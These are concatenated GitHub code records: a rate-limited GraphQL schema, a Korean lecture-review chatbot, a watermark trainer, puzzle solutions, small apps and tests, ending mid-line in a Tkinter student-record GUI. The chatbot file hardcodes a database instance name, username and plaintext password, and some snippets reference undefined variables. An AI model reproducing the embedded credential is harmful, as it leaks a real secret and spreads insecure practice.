Exception(\"Invalid project specified.\")\n\n # convert to Project and set defaults\n project = Project(\n project=p.project,\n project_version=p.project_version,\n language=p.language,\n language_version=p.language_version,\n session_id=p.session_id,\n timestamp=now(),\n context=Context(\n user_id=p.user_id,\n user_type=p.user_type,\n platform=p.platform,\n container=p.container,\n is_ci=p.is_ci,\n ),\n process=Process(\n status=p.status,\n status_desc=p.status_desc,\n error_type=p.error_type,\n error_desc=p.error_desc,\n ),\n )\n\n fetched = await fetch_project_info(p.project)\n\n # return project info ASAP, assign data ingestion as background tasks\n request = info.context['request']\n bg_tasks = info.context['background_tasks']\n bg_tasks.add_task(ingest_project, project)\n\n return {\n 'bad_versions': fetched['bad_versions'],\n 'cached': fetched['cached'],\n 'latest_version': fetched['version'],\n 'message': '', # TODO: Allow message for bad_versions\n 'success': fetched['success'],\n }\n\n\nclass RateLimiter(SchemaExtension):\n \"\"\"\n A GraphQL schema extension to implement sliding window rate limiting.\n\n This class has fine-grain control of the GraphQL execution stack.\n This extension verifies that incoming requests:\n - Have a reasonable sized request body\n - Are not clobbering the GQL endpoint\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n self.set_attrs()\n super().__init__(*args, **kwargs)\n\n def set_attrs(self):\n self.request_window = int(os.getenv(\"MIGAS_REQUEST_WINDOW\", \"60\"))\n self.max_requests = int(os.getenv(\"MIGAS_MAX_REQUESTS_PER_WINDOW\", \"100\"))\n self.max_request_size = int(os.getenv(\"MIGAS_MAX_REQUEST_SIZE\", \"2500\"))\n\n async def on_operation(self):\n \"\"\"\n Hook into the GraphQL request stack, and validate data at the start.\n \"\"\"\n if os.getenv(\"MIGAS_TESTING\"):\n self.set_attrs()\n request = self.execution_context.context['request']\n response = self.execution_context.context['response']\n if not os.getenv(\"MIGAS_BYPASS_RATE_LIMIT\"):\n await self.sliding_window_rate_limit(request, response)\n # check request size\n body = await request.body()\n if len(body) > self.max_request_size:\n response.status_code = 413\n 
self.execution_context.result = GraphQLExecutionResult(\n data=None,\n errors=[\n GraphQLError(\n f'Request body ({len(body)}) exceeds maximum size ({self.max_request_size})'\n )\n ],\n )\n yield # any logic after yield for post operation\n\n\n async def sliding_window_rate_limit(self, request: Request, response: Response):\n \"\"\"\n Use a sliding window to verify incoming responses are not overloading the server.\n\n Requests are checked to be in the range set by two environmental variables:\n `MIGAS_REQUEST_WINDOW` and `MIGAS_MAX_REQUESTS_PER_WINDOW`\n \"\"\"\n import time\n\n cache = await get_redis_connection()\n # the sliding window key\n key = f'rate-limit-{request.client.host}'\n time_ = time.time()\n\n async with cache.pipeline(transaction=True) as pipe:\n pipe.zremrangebyscore(key, 0, time_ - self.request_window)\n pipe.zrange(key, 0, -1)\n pipe.zadd(key, {time_: time_})\n pipe.expire(key, self.request_window)\n res = await pipe.execute()\n\n timestamps = res[1]\n if len(timestamps) > self.max_requests:\n response.status_code = 429 # Too many requests\n self.execution_context.result = GraphQLExecutionResult(\n data=None,\n errors=[GraphQLError('Too many requests, wait a minute.')],\n )\n\n\nSCHEMA = strawberry.Schema(\n query=Query,\n mutation=Mutation,\n extensions=[RateLimiter],\n config=StrawberryConfig(auto_camel_case=False),\n)\n","repo_name":"nipreps/migas-server","sub_path":"migas/server/schema.py","file_name":"schema.py","file_ext":"py","file_size_in_byte":7283,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"9146749733","text":"import vertexai\nfrom transformers import AutoModel, AutoTokenizer\nfrom vertexai.preview.language_models import ChatModel, InputOutputTextPair, ChatMessage\nfrom db_connect import db_connect\n\n# PROJECT_ID = \"esoteric-stream-399606\"\n# LOCATION = \"us-central1\"\ninstance_connection_name = \"esoteric-stream-399606:asia-northeast3:wjdfoek3\"\ndb_user = \"postgres\"\ndb_pass = \"pgvectorwjdfo\"\ndb_name = \"pgvector\"\nvdb = db_connect(instance_connection_name, db_user, db_pass, db_name)\n\nclass first_chatbot:\n def __init__(self, proj_id, loc):\n vertexai.init(project = proj_id, location = loc)\n\n @staticmethod\n def get_KoSimCSE():\n model = AutoModel.from_pretrained('BM-K/KoSimCSE-roberta-multitask')\n tokenizer = AutoTokenizer.from_pretrained('BM-K/KoSimCSE-roberta-multitask')\n\n return model, tokenizer\n\n def separate(self, question):\n model, tokenizer = get_KoSimCSE()\n query_text = input(\"Q >> \")\n\n chat_model = ChatModel.from_pretrained(\"chat-bison@001\") #chat model 불러오기\n\n chat = chat_model.start_chat(\n context=\"수업에 대해 궁금해하는 학생들이 과목, 교수에 대해 질문하는 서비스야. 
강의평과 관련된 질문이면 질문 내용에 질문을 출력해주고 아니면 그냥 NULL을 출력해줘\",\n examples=[\n InputOutputTextPair(\n input_text=\"정기숙 교수님 자료구조응용 수업 어때?에서 과목명, 교수명, 질문 내용이 뭐야?\",\n output_text=\"과목명 자료구조응용 교수명 정기숙 질문 내용 수업이 어떤지 물어보는 내용\",\n ),\n InputOutputTextPair(\n input_text=\"정기숙 교수님 어때?에서 과목명, 교수명, 질문내용이 뭐야?\",\n output_text=\"과목명 NULL 교수명 정기숙 질문 내용 교수님이 어떤지 물어보는 내용\",\n ),\n InputOutputTextPair(\n input_text=\"자료구조응용 수업 어때?에서 과목명, 교수명, 질문내용이 뭐야?\",\n output_text=\"과목명 자료구조응용 교수명 NULL 질문 내용 수업이 어떤지 물어보는 내용\",\n ),\n InputOutputTextPair(\n input_text=\"과제 어떻고 수업 어때?에서 과목명, 교수명, 질문 내용이 뭐야?\",\n output_text=\"질문 내용 과제가 어떻고 수업이 어떤지 물어보는 내용\",\n ),\n InputOutputTextPair(\n input_text=\"강의평과 관련 없는 질문\",\n output_text=\"NULL\",\n ),\n ],\n temperature=0.0,\n max_output_tokens=1024,\n top_p=0.8,\n top_k=1\n )\n\n #LLM에게 질문해서 user의 input으로부터 과목, 교수명 가져오기\n key_query = chat.send_message(question+\"에서 과목명, 교수명, 질문 내용이 뭐야?\").text\n\n if key_query == \"NULL\" :\n print(\"강의평과 관련된 내용을 입력하세요.\")\n return\n\n lec, prof, query = extract(key_query)\n inputs = tokenizer(query, padding=True, truncation=True, return_tensors=\"pt\")\n\n embeddings, _ = model(**inputs, return_dict=False)\n embedding_arr = embeddings[0][0].detach().numpy()\n embedding_str = \",\".join(str(x) for x in embedding_arr)\n embedding_str = \"[\"+embedding_str+\"]\"\n\n return lec, prof, embedding_str\n\n @staticmethod\n def extract(q): #LLM의 output으로부터 prof name, lecture name 추출\n lec = q.find(\"과목명\")\n prof = q.find(\"교수명\")\n q_start = q.find(\"질문 내용\")\n\n lecture = q[lec+4:prof-1]\n professor = q[prof+4:]\n query = q[q_start+6:]\n if lecture == \"NULL\" : lecture = None\n if professor == \"NULL\" : professor = None\n return lecture, professor, query\n\n def chat(self, query_text, history):\n chat_model = ChatModel.from_pretrained(\"chat-bison@001\")\n\n output_chat = chat_model.start_chat(\n context=\"강의를 찾는 대학생들에게 강의평들을 토대로 수업이 어떤지 알려주는 서비스야, 주어진 강의평들을 요약해서 학생들에게 알려줘\" + articles + \"강의평을 가져올 때는 있는 그대로 가져오지 말고 나름대로 요약해서 알려주고 공손하게 알려줘\",\n message_history = history,\n temperature=0.3,\n max_output_tokens=1024,\n top_p=0.8,\n top_k=10\n )\n\n output = output_chat.send_message(query_text).text\n\n history.append(ChatMessage(content = query_text, author = \"user\"))\n history.append(ChatMessage(content = output, author = \"bot\"))\n\n","repo_name":"Hollyys/Chatbot","sub_path":"LLM.py","file_name":"LLM.py","file_ext":"py","file_size_in_byte":4923,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30439746100","text":"import torch\nimport numpy as np\nfrom torch import nn\nfrom tqdm import tqdm\n\nfrom core.base_trainer import BaseTrainer\nfrom engine import validate_watermark\n\n\nclass Trainer(BaseTrainer):\n def __init__(self, args, device, model, optimizer, train_loader):\n super().__init__(args.epochs, model, optimizer, train_loader, device)\n self.args = args\n self.num_class = args.output_channel\n self.batch_size = args.batch_size\n self.half_batch_size = int(self.batch_size / 2)\n self.trigger_label = args.target * torch.ones([self.batch_size], dtype=torch.long).to(device)\n self.w_label = torch.zeros([self.batch_size]).to(device)\n self.w_label[:self.half_batch_size] = 1\n self.temperatures = torch.tensor(args.temperatures, dtype=torch.float).to(device)\n\n def fgsm_optimize_trigger(self, trigger, target_data, w_num_batch):\n batch_size = self.args.batch_size\n device = self.device\n half_batch_size = int(batch_size / 2)\n height = target_data[0].shape[0]\n width = 
target_data[0].shape[1]\n if self.args.distribution == \"in\":\n trigger_grad = []\n for batch in range(w_num_batch):\n batch_data = np.concatenate([trigger[batch * half_batch_size: (batch + 1) * half_batch_size],\n target_data[batch * half_batch_size: (batch + 1) * half_batch_size]], 0)\n batch_data = torch.from_numpy(batch_data).to(device, dtype=torch.float)\n snnl = self.model.snnl_trigger(batch_data, self.w_label, self.temperatures)\n grad = torch.autograd.grad(snnl, batch_data, grad_outputs=torch.ones_like(snnl))[0][:half_batch_size]\n trigger_grad.append(grad)\n avg_grad = np.average(np.concatenate(trigger_grad), 0)\n down_sample = np.array(\n [[np.sum(avg_grad[i: i + 3, j: j + 3]) for i in range(height - 2)] for j in range(width - 2)])\n w_pos = np.unravel_index(down_sample.argmin(), down_sample.shape)\n trigger[:, w_pos[0]:w_pos[0] + 3, w_pos[1]:w_pos[1] + 3, 0] = 1\n else:\n w_pos = [-1, -1]\n\n step_list = np.zeros([w_num_batch])\n for batch in range(w_num_batch):\n current_trigger = trigger[batch * half_batch_size: (batch + 1) * half_batch_size]\n for epoch in range(self.args.maxiter):\n while validate_watermark(self.model, current_trigger, self.args.target, batch_size,\n self.num_class) > self.args.threshold and step_list[batch] < 50:\n step_list[batch] += 1\n inputs = np.concatenate([current_trigger, current_trigger], 0)\n inputs = torch.from_numpy(inputs).to(device, dtype=torch.float).requires_grad_()\n output = self.model(inputs, True)[-1]\n prediction = torch.unbind(output, dim=1)[self.args.target]\n gradient = torch.autograd.grad(prediction, inputs,\n grad_outputs=torch.ones_like(prediction))[0]\n # current_trigger = np.clip(current_trigger - w_lr * np.sign(grad[:half_batch_size]), 0, 1)\n current_trigger = np.clip(\n current_trigger - self.args.w_lr * np.sign(gradient[:half_batch_size].cpu().numpy()), 0, 1)\n\n batch_data = np.concatenate([current_trigger,\n target_data[batch * half_batch_size: (batch + 1) * half_batch_size]], 0)\n batch_data = torch.from_numpy(batch_data).to(device, dtype=torch.float).requires_grad_()\n predictions = self.model.snnl_trigger(batch_data, self.w_label)\n gradient = torch.autograd.grad(predictions, batch_data,\n grad_outputs=[torch.ones_like(pred) for pred in predictions])[0]\n current_trigger = np.clip(\n current_trigger + self.args.w_lr * np.sign(gradient[:half_batch_size].cpu().numpy()),\n 0, 1)\n\n for i in range(5):\n inputs = np.concatenate([current_trigger, current_trigger], 0)\n inputs = torch.from_numpy(inputs).to(device, dtype=torch.float).requires_grad_()\n output = self.model(inputs, True)[-1]\n prediction = torch.unbind(output, dim=1)[self.args.target]\n gradient = torch.autograd.grad(prediction, inputs,\n grad_outputs=torch.ones_like(prediction))[0]\n current_trigger = np.clip(\n current_trigger - self.args.w_lr * np.sign(gradient[:half_batch_size].cpu().numpy()),\n 0, 1)\n trigger[batch * half_batch_size: (batch + 1) * half_batch_size] = current_trigger\n\n def watermark_model(self, num_batch, w_num_batch, trigger, target_data):\n n_w_ratio = self.args.ratio\n iterator = iter(self.train_loader)\n criterion = nn.CrossEntropyLoss()\n j = 0\n for _ in tqdm(range(round(self.args.w_epochs * num_batch / w_num_batch))):\n for batch in range(w_num_batch):\n if n_w_ratio >= 1:\n for i in range(int(n_w_ratio)):\n if j >= num_batch:\n j = 0\n self.step_once(iterator, criterion)\n j += 1\n if n_w_ratio > 0 and n_w_ratio % 1 != 0 and n_w_ratio * batch >= j:\n if j >= num_batch:\n j = 0\n self.step_once(iterator, criterion)\n j += 1\n 
batch_data = np.concatenate([trigger[batch * self.half_batch_size: (batch + 1) * self.half_batch_size],\n target_data[\n batch * self.half_batch_size: (batch + 1) * self.half_batch_size]], 0)\n batch_data = torch.from_numpy(batch_data).to(self.device, dtype=torch.float).requires_grad_()\n pred = self.model(batch_data, True)[-1]\n self.temperatures = self.temperatures.requires_grad_()\n snnl = self.model.snnl_trigger(batch_data, self.w_label, self.temperatures)\n grad = \\\n torch.autograd.grad(snnl, self.temperatures, grad_outputs=[torch.ones_like(s) for s in snnl])[\n 0]\n loss = criterion(pred, self.trigger_label)\n self.optimizer.zero_grad()\n loss.backward()\n self.optimizer.step()\n self.temperatures.data -= self.args.t_lr * grad\n\n def step_once(self, iterator, criterion):\n try:\n batch, target = next(iterator)\n except StopIteration:\n iterator = iter(self.train_loader)\n batch, target = next(iterator)\n batch = batch.to(self.device)\n target = target.to(self.device)\n pred = self.model(batch)[-1]\n loss = criterion(pred, target)\n self.optimizer.zero_grad()\n loss.backward()\n self.optimizer.step()\n","repo_name":"RorschachChen/entangled-watermark-torch","sub_path":"core/trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":7231,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"72"} +{"seq_id":"12844942985","text":"import time \nimport numpy as np\n\n\nproblem_number = 82\ntest_solution = 994\n\n\n#read data\n\n\nnumber_file = open(\"data.txt\", \"r\")\nraw_data = number_file.read()\nnumber_file.close()\n\ntest = raw_data.split('\\n')\nmatrix_value = []\n\nfor row in test:\n matrix_value.append(row.split(','))\n\nfor i in range(len(matrix_value)):\n for j in range(len(matrix_value)):\n matrix_value[i][j] = int(matrix_value[i][j])\n\n\n#Solution\n\n\ndef solution(matrix_input):\n size = len(matrix_input)\n \n min_matrix = [[0 for j in range(size)] for i in range(size)] \n \n for i in range(size):\n min_matrix[i][0] = matrix_input[i][0]\n \n for j in range(1, size):\n for i in range(size):\n \n min_value = np.infty\n \n for previous_index in range(size):\n \n value = min_matrix[previous_index][j - 1]\n \n if previous_index == i:\n value += matrix_input[i][j]\n elif previous_index < i:\n for index in range(previous_index, i + 1):\n value += matrix_input[index][j]\n else:\n for index in range(i, previous_index + 1):\n value += matrix_input[index][j]\n \n if value < min_value:\n min_value = value\n \n min_matrix[i][j] = min_value\n \n result = np.infty\n for i in range(size):\n if result > min_matrix[i][size - 1]:\n result = min_matrix[i][size - 1]\n \n return result\n\n\n#Test & Result\n\n\nfichier = open(\"Solution \"+str(problem_number)+\".txt\", \"w\")\nstring = \"\"\n\nbegin_test = time.time()\ntest_value = solution([[131, 673, 234, 103, 18], [201, 96, 342, 965, 150], [630, 803, 746, 422, 111], [537, 699, 497, 121, 956], [805, 732, 524, 37, 331]])\nend_test = time.time()\ntest_time = end_test - begin_test\n\nstring += \"TEST #1\\n\\n\"\nstring += \"Output: \"+str(test_value)+\"\\n\"\nstring += \"Answer: \"+str(test_solution)+\"\\n\"\nstring += \"Computation time: \"+str(test_time)+\" sec\\n\"\nstring += \"Verification: \"\n\nif(test_value == test_solution):\n string += \"TRUE\"\nelse:\n string += \"FALSE\"\n \n\nbegin_problem = time.time()\nproblem_value = solution(matrix_value)\nend_problem = time.time()\nproblem_time = end_problem - begin_problem\n\nstring += \"\\n\\n\\nRESULT PROBLEM 
#\"+str(problem_number)+\"\\n\\n\"\nstring += \"Output: \"+str(problem_value)+\"\\n\"\nstring += \"Computation time: \"+str(problem_time)+\" sec\\n\"\n\nstring += \"\\n\\n\\nCurrent date & time: \" + time.strftime(\"%c\")\n\nfichier.write(string)\nfichier.close()\n","repo_name":"FrancoisdeFouchecour/Projet-Euler","sub_path":"Problems/82-Problem/Problem 82.py","file_name":"Problem 82.py","file_ext":"py","file_size_in_byte":2631,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"70676996712","text":"from random import randint, random\n\nMUTATION_RATE = 0.2\n\n'''Clase que representa una solución al problema de N reinas en un tablero de NxN.\nLa solución se representa simplemente con las posiciones de las N reinas.\n'''\nclass NQueenIndividual:\n def __init__(self, n):\n '''Crea un intento de solución para el problema de N reinas en un tablero NxN\n '''\n self.n = n\n self.queens = []\n for _ in range(n):\n while True:\n new_queen = [randint(0, n - 1), randint(0, n - 1)]\n if new_queen not in self.queens:\n self.queens.append(new_queen)\n break\n\n\n def reproduce(self, another_nqueens):\n '''Crea una nueva solución, a partir de las dos soluciones padres\n '''\n child = NQueenIndividual(self.n)\n\n division = randint(0, self.n)\n child.queens = self.queens[:division]\n\n for new_queen in another_nqueens.queens[division:]:\n if new_queen in child.queens:\n while True:\n new_queen = [randint(0, self.n - 1), randint(0, self.n - 1)]\n if new_queen not in child.queens:\n break\n child.queens.append(new_queen)\n\n for i in range(self.n):\n # Si se muta, poner una reina completamente nueva\n if random() < MUTATION_RATE:\n while True:\n new_queen = [randint(0, self.n - 1), randint(0, self.n - 1)]\n if new_queen not in child.queens:\n child.queens[i] = new_queen\n break\n\n return child\n","repo_name":"danno-s/genetic-algorithm","sub_path":"src/nqueen_individual.py","file_name":"nqueen_individual.py","file_ext":"py","file_size_in_byte":1656,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15205221439","text":"#!/usr/bin/env python\n\nimport sys\n\nline = sys.stdin.readline()\nline = line.rstrip()\n\ncases = int(line)\n\nfor case in xrange(0, cases):\n K = int(sys.stdin.readline().strip())\n ds = map(int, sys.stdin.readline().rstrip().split())\n ds[0:1] = []\n\n indexes = range(0,K)\n cards = [-1]*K\n\n I = 0\n for X in xrange(0,K):\n I+=X\n I = I%(len(indexes))\n ii = I%(K-X)\n i = indexes[ii]\n indexes[ii:ii+1] = []\n cards[i] = X\n\n sys.stdout.write(\"Case #%d:\" % (case+1))\n for d in ds:\n sys.stdout.write(\" %d\" % (cards[d-1]+1))\n sys.stdout.write(\"\\n\")\n\n","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/CodeJamData/08/23/8.py","file_name":"8.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"39224411662","text":"import streamlit as st\r\nimport joblib\r\n\r\nmodel = joblib.load('./model.pkl')\r\nvectorizer = joblib.load('./vectorizer.pkl')\r\n\r\ndef predict_review(review_text):\r\n review_text = [review_text]\r\n review_text = vectorizer.transform(review_text).toarray()\r\n prediction = model.predict(review_text)\r\n return prediction[0]\r\n\r\ndef app():\r\n st.title('Review Sentiment Analysis App')\r\n\r\n review = st.text_input('Enter your review:')\r\n if st.button('Submit'):\r\n prediction = predict_review(review)\r\n if prediction == 1:\r\n 
st.write('This app is not fraudulent.')\r\n st.balloons();\r\n else:\r\n st.write('This app is fraudulent.')\r\n\r\n positive_proba = model.predict_proba(vectorizer.transform([review]))[0][1]\r\n negative_proba = model.predict_proba(vectorizer.transform([review]))[0][0]\r\n st.write(f\"Positive sentiment probability: {round(positive_proba*100)}%\")\r\n st.write(f\"Negative sentiment probability: {round(negative_proba*100)}%\")\r\n # st.slider(\"Sentiment Percentage\", 0, 100, (positive_proba*100))\r\n\r\n\r\nif __name__ == '__main__':\r\n app()\r\n","repo_name":"Gatecoders/FraudAppProject","sub_path":"webApp.py","file_name":"webApp.py","file_ext":"py","file_size_in_byte":1141,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3348885222","text":"class Solution:\n def minPathSum(self, mat: List[List[int]]) -> int:\n if len(mat) == 1:\n return sum(mat[0])\n for i in range(len(mat)-1):\n for j in range(len(mat[i])-1):\n if j == 0:\n mat[i+1][0] += mat[i][0]\n if i == 0:\n mat[0][j+1] += mat[0][j]\n\n for i in range(1, len(mat)):\n for j in range(1, len(mat[i])):\n mat[i][j] = mat[i][j] + min(mat[i-1][j], mat[i][j-1])\n\n return mat[-1][-1]\n","repo_name":"sasankyadavalli/leetcode","sub_path":"minPathSum_64.py","file_name":"minPathSum_64.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70164996394","text":"# source: https://www.rosettacode.org/wiki/Averages/Mean_time_of_day#Python\n\nfrom cmath import rect, phase\nfrom math import radians, degrees\n\nclass Utils:\n @staticmethod\n def meanAngle(deg):\n return degrees(phase(sum(rect(1, radians(d)) for d in deg)/len(deg)))\n\n @staticmethod\n def meanTime(times):\n t = (time.split(':') for time in times)\n seconds = ((float(s) + int(m) * 60 + int(h) * 3600)\n for h, m, s in t)\n day = 24 * 60 * 60\n to_angles = [s * 360. 
/ day for s in seconds]\n mean_as_angle = Utils.meanAngle(to_angles)\n mean_seconds = mean_as_angle * day / 360.\n if mean_seconds < 0:\n mean_seconds += day\n h, m = divmod(mean_seconds, 3600)\n m, s = divmod(m, 60)\n return '%02i:%02i:%02i' % (h, m, s)\n","repo_name":"zameerbharwani/UW_CS_Host_Tracker","sub_path":"Utils.py","file_name":"Utils.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"994279707","text":"import os\nimport glob\nimport unittest\nimport pytorch_lightning as pl\n\nimport logging\nlogging.basicConfig(level=logging.DEBUG, format='%(asctime)s - %(levelname)s - %(message)s')\n\nfrom pathlib import Path\nfrom utils import tools, callbacks, supported_preprocessing_transforms\nfrom modules.vae_base_module import VAEBaseModule\nfrom datasets import supported_datamodules\nfrom models import supported_models\n\n\nclass TestVAETraining(unittest.TestCase):\n\n def test_vae_config_compatability(self):\n\n # TODO: Replace with glob once all models and configurations are operational (see test_cae_training.py)\n config_paths = [\n 'configs/vae/vae_simple_mnist.yaml',\n 'configs/vae/vae_simple_curiosity.yaml',\n 'configs/vae/vae_baseline_curiosity.yaml'\n ]\n for pth in config_paths:\n logging.info(f\"Testing training for: {pth}\")\n config = tools.load_config(pth)\n\n module = _test_training_pipeline(config)\n\n log_path = Path('tests') / \\\n 'test_logs' / \\\n config['experiment-parameters']['datamodule'] / \\\n config['experiment-parameters']['model'] / \\\n f'version_{module.version}'\n logging.info(log_path)\n\n self.assertTrue( (log_path / 'checkpoints').is_dir() )\n self.assertTrue( (log_path / 'configuration.yaml').is_file() )\n self.assertTrue( (log_path / 'model_summary.txt').is_file() )\n\n\ndef _test_training_pipeline(config):\n \"\"\"This pipeline shadows the pipeline in trainers/train_vae.py with modifications for testing\"\"\"\n # Change log_dir for testing\n config['experiment-parameters']['log_dir'] = os.path.join('tests', 'test_logs')\n\n # Set up preprocessing routine\n preprocessing_transforms = supported_preprocessing_transforms[config['data-parameters']['preprocessing']]\n\n datamodule = supported_datamodules[config['experiment-parameters']['datamodule']](\n data_transforms=preprocessing_transforms,\n **config['data-parameters'])\n datamodule.prepare_data()\n datamodule.setup('train')\n\n model = supported_models[config['experiment-parameters']['model']](\n datamodule.data_shape, **config['module-parameters'])\n\n # Initialize experimental module\n module = VAEBaseModule(\n model,\n train_size=datamodule.train_size,\n val_size=datamodule.val_size,\n batch_size=datamodule.batch_size,\n **config['module-parameters'])\n\n # Initialize loggers to monitor training and validation\n logger = pl.loggers.TensorBoardLogger(\n config['experiment-parameters']['log_dir'], # Temp location for dummy logs\n name=os.path.join(config['experiment-parameters']['datamodule'], config['experiment-parameters']['model']))\n\n # Initialize the Trainer object\n trainer = pl.Trainer(\n gpus=1,\n logger=logger,\n max_epochs=1,\n weights_summary=None,\n callbacks=[\n pl.callbacks.EarlyStopping(\n monitor='val_elbo_loss',\n patience=5 if config['experiment-parameters']['patience'] is None else config['experiment-parameters']['patience']),\n pl.callbacks.ModelCheckpoint(\n monitor='val_elbo_loss',\n filename='{val_elbo_loss:.2f}-{epoch}',\n save_last=True),\n 
pl.callbacks.GPUStatsMonitor(),\n callbacks.VAEVisualization()\n ])\n\n # Find learning rate\n lr, lr_finder_fig = callbacks.learning_rate_finder(trainer, module, datamodule, num_training=25)\n module.lr = lr\n config['module-parameters']['learning_rate'] = module.lr\n\n # Train the model\n trainer.fit(module, datamodule)\n\n # Remove try-except block for testing\n tools.save_object_to_version(\n config, version=module.version, filename='configuration.yaml', **config['experiment-parameters'])\n tools.save_object_to_version(\n str(model), version=module.version, filename='model_summary.txt', **config['experiment-parameters'])\n\n return module\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"brahste/novelty-detection","sub_path":"tests/test_vae_training.py","file_name":"test_vae_training.py","file_ext":"py","file_size_in_byte":4118,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"12058045175","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n'Prim'\n\n__author__ = 'lxp'\n\n#《大话数据结构》247页,基于邻接矩阵的最小生成树Prim算法\n\nimport adjacencyMatrix\n\ndef miniSpanTree_Prim(G):\n\tlowcost = []\n\tadjvex = []\n\tfor i in range(G.numVertexes):\n\t\tlowcost.append(G.arc[0][i])\n\t\tadjvex.append(0)\n\tfor i in range(1, G.numVertexes):\n\t\tmin_ = float('inf')\n\t\tj = 1\n\t\tk = 0\n\t\twhile j < G.numVertexes:\n\t\t\tif lowcost[j] != 0 and lowcost[j] < min_:\n\t\t\t\tmin_ = lowcost[j]\n\t\t\t\tk = j\n\t\t\tj = j + 1\n\t\tprint(\"本次循环选择边的下标为: \", adjvex[k], k)\n\t\tfor j in range(1, G.numVertexes):\n\t\t\tif G.arc[k][j] < lowcost[j]:\n\t\t\t\tlowcost[j] = G.arc[k][j]\n\t\t\t\tadjvex[j] = k\n\n\treturn\n\n\n#test\ndef test():\n\tsample = adjacencyMatrix.MGraph()\n\tsample.createMGraph()\n\tsample.showMGraph()\n\tminiSpanTree_Prim(sample)\n\treturn\n\nif __name__ == '__main__':\n\ttest()","repo_name":"LiuXPeng/pythonDataStructure","sub_path":"Prim.py","file_name":"Prim.py","file_ext":"py","file_size_in_byte":862,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25901420106","text":"from customtkinter import *\r\nfrom helper import * \r\n\r\n\r\nmode= \"dark\"\r\nset_appearance_mode(mode)\r\nset_default_color_theme(\"dark-blue\")\r\n\r\n\r\ndef ldMode():\r\n set_appearance_mode(\"light\")\r\ndef dMode():\r\n set_appearance_mode(\"dark\")\r\n\r\ndef get():\r\n ent= txt.get()\r\n # name=txt3.get()\r\n # bir=txt2.get()\r\n entry.delete(0, END)\r\n entry1.delete(0, END)\r\n entry2.delete(0, END)\r\n newWindow= CTkToplevel(root)\r\n newWindow.title(\"Student Record\")\r\n newWindow.geometry(\"500x600\")\r\n frame= CTkFrame(master=newWindow)\r\n frame.pack(pady=20, padx= 60 , fill='both', expand= True)\r\n l1= CTkLabel(frame, text=\"Student Information\", font= (\"san sarif\", 20, \"bold\"))\r\n l1.pack(pady=10,padx=10)\r\n S1.fetch_all(ent)\r\n if len(ent)== 0:\r\n le2= CTkLabel(frame, text=\"All field are required\", font= (\"san sarif\", 20, \"bold\"))\r\n le2.pack(pady=10,padx=10)\r\n if len(ent) >10:\r\n le1= CTkLabel(frame, text=\"No Student Found\", font= (\"san sarif\", 20, \"bold\"))\r\n le1.pack(pady=10,padx=10)\r\n else:\r\n lA=CTkLabel(frame, text=\"Name:\" ,font= (\"san sarif\", 15 ,\"bold\"))\r\n lA.pack(padx=100)\r\n lA1= CTkLabel(frame, text=rec[1])\r\n lA1.pack(padx=10)\r\n\r\n lB=CTkLabel(frame, text=\"Enrollment No:\" ,font= (\"san sarif\", 15 ,\"bold\"))\r\n lB.pack(padx=100)\r\n lB2= CTkLabel(frame, text=rec[2])\r\n lB2.pack(padx=10)\r\n\r\n 
lC=CTkLabel(frame, text=\"Date of Birth:\" ,font= (\"san sarif\", 15 ,\"bold\"))\r\n lC.pack(padx=100)\r\n lC2= CTkLabel(frame, text=rec[3])\r\n lC2.pack(padx=10)\r\n\r\n lD=CTkLabel(frame, text=\"Father's Name:\" ,font= (\"san sarif\", 15 ,\"bold\"))\r\n lD.pack(padx=100)\r\n lD2= CTkLabel(frame, text=rec[4])\r\n lD2.pack(padx=10)\r\n\r\n lE=CTkLabel(frame, text=\"Course:\" ,font= (\"san sarif\", 15 ,\"bold\"))\r\n lE.pack(padx=100)\r\n lE2= CTkLabel(frame, text=rec[5])\r\n lE2.pack(padx=10)\r\n\r\n lF=CTkLabel(frame, text=\"Fee Status:\" ,font= (\"san sarif\", 15 ,\"bold\"))\r\n lF.pack(padx=100)\r\n lF2= CTkLabel(frame, text=rec[6])\r\n lF2.pack(padx=10)\r\n\r\n lG=CTkLabel(frame, text=\"Gender:\" ,font= (\"san sarif\", 15 ,\"bold\"))\r\n lG.pack(padx=100)\r\n lG2= CTkLabel(frame, text=rec[7])\r\n lG2.pack(padx=10)\r\n\r\n lH=CTkLabel(frame, text=\"Semester:\" ,font= (\"san sarif\", 15 ,\"bold\"))\r\n lH.pack(padx=100)\r\n lH2= CTkLabel(frame, text=rec[8])\r\n lH2.pack(padx=10)\r\n\r\n lI=CTkLabel(frame, text=\"G-mail:\" ,font= (\"san sarif\", 15 ,\"bold\"))\r\n lI.pack(padx=100)\r\n lI2= CTkLabel(frame, text=rec[9])\r\n lI2.pack(padx=10)\r\n\r\n\r\n\r\n \r\n\r\n\r\nroot = CTk()\r\nroot.title(\"Student Record Portal\")\r\nroot.geometry(\"500x500\")\r\nframe= CTkFrame(master=root )\r\nframe.pack(pady=20, padx= 60 , fill='both', expand= True)\r\nlabel1= CTkLabel(master=frame, text=\"School of Electronic , Davv\" , font= (\"san sarif\", 20, \"bold\") )\r\nlabel1.pack( pady=12, padx=10)\r\n\r\n\r\n\r\n \r\nlabel= CTkLabel(master=frame, 